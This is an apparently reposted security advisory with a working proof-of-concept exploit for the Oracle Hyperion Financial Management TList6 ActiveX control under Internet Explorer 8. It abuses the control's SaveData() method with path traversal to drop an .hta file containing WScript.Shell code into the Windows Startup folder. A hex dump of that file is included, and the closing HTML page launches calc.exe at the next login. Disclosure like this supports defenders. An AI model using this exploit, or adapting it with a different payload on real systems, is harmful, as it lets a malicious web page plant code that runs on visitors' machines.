扫码分享
验证:
体验盒子Oracle Hyperion Financial Management TList6 ActiveX
Control Remote Code Execution Vulnerability
tested against: Internet Explorer 8
Microsoft Windows Server 2003 r2 sp2
download url:
http://www.oracle.com/technetwork/middleware/epm/downloads/index.html
files tested:
SystemInstaller-11121-win32.zip
FoundationServices-11121-win32-Part1.zip
FoundationServices-11121-win32-Part2.zip
FoundationServices-11121-win32-Part3.zip
FoundationServices-11121-win32-Part4.zip
FoundationServices-11121-Part5.zip
FoundationServices-11121-Part6.zip
FoundationServices-11121-Part7.zip
StaticContent-11121.zip
RandAFoundation-11121.zip
EPM_Architect-11121.zip
HyperionFinancialManagement-11121.zip
Background:
the mentioned program installs an ActiveX control with the following
settings:
Binary Path: C:\WINDOWS\system32\TList6.ocx
ProgID: TList.TList.6
CLSID: {65996200-3B87-11D4-A21F-00E029189826}
Safe for Initialization (Registry): True
Safe for Scripting (Registry): True
This control is marked "safe for scripting" and "safe for initialization",
Internet Explorer will allows scripting of this control.
Vulnerability:
The mentioned class contains the vulnerable SaveData() method, see typelib:
...
/* DISPID=167 */
/* VT_I2 [2] */
function SaveData(
/* VT_BSTR [8]*/ $lpszFileName
)
{
}
...
which allows to create / overwrite files with arbitrary extensions
inside arbitrary locations ex. automatic startup folders. By manipulating
ex. the Caption property is possible to create a valid application
with .hta extension.
The resulting file will look like this:
000000 62 99 65 87 3b d4 11a2 1f 00 e0 29 18 98 26 .b™e‡;Ô. ¢..à).˜&
001009 00 06 00 ac 14 00 00ac 14 00 00 e4 00 00 00 ....¬... ¬...ä...
002000 03 52 e3 0b 91 8f ce11 9d e3 00 aa 00 4b b8 ..Rã.‘Î .ã.ª.K¸
003051 01 00 00 00 90 01 c0d4 01 00 0f 54 69 6d 65 Q.....À Ô...Time
004073 20 4e 65 77 20 52 6f6d 61 6e 01 00 01 01 00 s New Ro man.....
005008 00 00 80 05 00 00 800e 00 00 80 0d 00 00 80 ...€...€ ...€...€
00602c 01 00 00 e1 00 00 00e1 00 00 00 f1 ff ff ff ,...á... á...ñÿÿÿ
007000 00 00 00 00 00 00 0000 00 00 00 00 00 00 00 ........ ........
008000 00 00 00 00 00 00 0001 5c 61 3e 3e 3e 3e 3e ........ .\a>>>>>
00903e 3e 3e 3e 3e 3e 3e 3e3e 3e 3e 3e 3c 53 43 52 >>>>>>>> >>>><SCR
00a049 50 54 3e 20 76 61 7220 78 3d 6e 65 77 20 41 IPT> varx=new A
00b063 74 69 76 65 58 4f 626a 65 63 74 28 22 57 53 ctiveXOb ject("WS
00c063 72 69 70 74 2e 53 6865 6c 6c 22 29 3b 20 78 cript.Sh ell"); x
00d02e 45 78 65 63 28 22 4341 4c 43 2e 45 58 45 22 .Exec("C ALC.EXE"
00e029 3b 20 3c 2f 53 43 5249 50 54 3e 00 01 01 01 ); </SCR IPT>....
00f003 00 ff ff ff ff ff ffff ff 00 01 00 01 00 00 ..ÿÿÿÿÿÿ ÿÿ......
010000 00 00 00 00 00 00 0000 00 01 00 01 00 00 00 ........ ........
011001 00 00 00 00 00 03 0001 00 00 00 ff 00 00 00 ........ ....ÿ...
012000 00 00 08 00 00 80 0100 00 00 00 00 00 00 00 ......€. ........
013000 17 00 00 80 18 00 0080 00 00 00 00 01 00 1a ....€... €.......
014062 99 65 87 3b d4 11 a21f 00 e0 29 18 98 26 44 b™e‡;Ô.¢ ..à).˜&D
015055 02 00 00 00 12 00 0600 0b 00 02 00 00 00 00 U....... ........
016000 00 04 00 03 00 00 60ab 4e 06 10 00 00 00 5f .......` «N....._
01705f 4f 62 73 6f 6c 65 7465 56 61 6c 75 65 00 00 _Obsolet eValue..
018000 00 00 00 00 00 00 0060 ab 4e 06 00 00 00 00 ........ `«N.....
019001 4d 4b 10 00 00 00 0000 01 00 00 00 02 00 00 .MK..... ........
01a000 03 00 00 00 04 00 0000 05 00 00 00 06 00 00 ........ ........
01b000 07 00 00 00 08 00 0000 09 00 00 00 0a 00 00 ........ ........
01c000 0b 00 00 00 0c 00 0000 0d 00 00 00 0e 00 00 ........ ........
01d000 0f 00 00 00 00 00 ff00 00 ff ff ff 00 00 00 .......ÿ ..ÿÿÿ...
01e0ff 00 00 00 00 00 00 0500 00 00 02 00 00 00 00 ÿ....... ........
01f000 01 00 00 c0 c0 c0 2200 00 08 00 00 00 09 00 ....ÀÀÀ" ........
020001 00 00 80 bf ff 31 0000 00 8a e3 aa 2b 84 ee ...€¿ÿ1. ..Šãª+„î
0210e5 a0 2b 84 a8 ac a0 0c00 00 00 35 35 32 58 58 å +„¨¬ . ...552XX
022058 58 58 44 45 4d 4f 0800 00 00 4a 6f 68 6e 20 XXXDEMO. ...John
023044 6f 65 1e 00 01 00 0000 00 40 00 00 ff ff ff Doe..... ..@..ÿÿÿ
024000 90 01 00 00 02 00 d700 00 00 44 55 06 00 00 ......× ...DU...
025000 12 00 06 00 0b 00 0600 00 00 f8 8f 50 04 10 ........ ...øP..
026000 00 00 5f 5f 49 6e 6e65 72 50 69 63 41 6c 69 ...__Inn erPicAli
027067 6e 00 03 00 05 00 0000 00 10 58 66 04 13 00 gn...... ...Xf...
028000 00 5f 5f 49 6e 6e 6572 42 6f 72 64 65 72 43 ..__Inne rBorderC
02906f 6c 6f 72 00 03 00 0000 00 00 00 20 b5 56 08 olor.... .... µV.
02a013 00 00 00 5f 5f 49 6e6e 65 72 42 6f 72 64 65 ....__In nerBorde
02b072 53 74 79 6c 65 00 0300 00 00 00 00 00 30 f4 rStyle.. ......0ô
02c060 08 11 00 00 00 5f 5f49 6e 6e 65 72 42 61 63 `.....__ InnerBac
02d06b 43 6f 6c 6f 72 00 0300 c0 c0 c0 02 00 b8 c1 kColor.. .ÀÀÀ..¸Á
02e033 0d 11 00 00 00 5f 5f49 6e 6e 65 72 54 65 78 3.....__ InnerTex
02f074 41 6c 69 67 6e 00 0300 02 00 00 00 00 b8 54 tAlign.. ......¸T
03006d 0d 11 00 00 00 5f 5f49 6e 6e 65 72 41 6c 69 m.....__ InnerAli
031067 6e 6d 65 6e 74 00 0300 00 00 00 00 00 2e 00 gnment.. ........
032000 00..
proof of concept code which launches calc.exe at the next
startup:
http://retrogod.altervista.org/9sg_ohfm_poc.html
<!--
Oracle Hyperion Financial Management 11.1.2.1.0
TList6.ocx ActiveX Control Remote Code Execution Vulnerability PoC
tested against Internet Explorer 8
Microsoft Windows 2003 r2 sp2
Binary Path: C:\WINDOWS\system32\TList6.ocx
ProgID: TList.TList.6
CLSID: {65996200-3B87-11D4-A21F-00E029189826}
Safe for Initialization (Registry): True
Safe for Scripting (Registry): True
rgod
-->
<!-- saved from url=(0014)about:internet -->
<html>
<object classid='clsid:65996200-3B87-11D4-A21F-00E029189826' id='obj' />
</object>
<script>
obj.Caption = ">>>>>>>>>>>>>>>>><" + "SCRIPT> var x=new ActiveXObject(\"WScript.Shell\"); x.Exec(\"CALC.EXE\"); <" +"/SCRIPT>";
obj.SaveData("..\\..\\..\\..\\..\\..\\..\\..\\..\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\suntzu.hta");
</script>
体验盒子
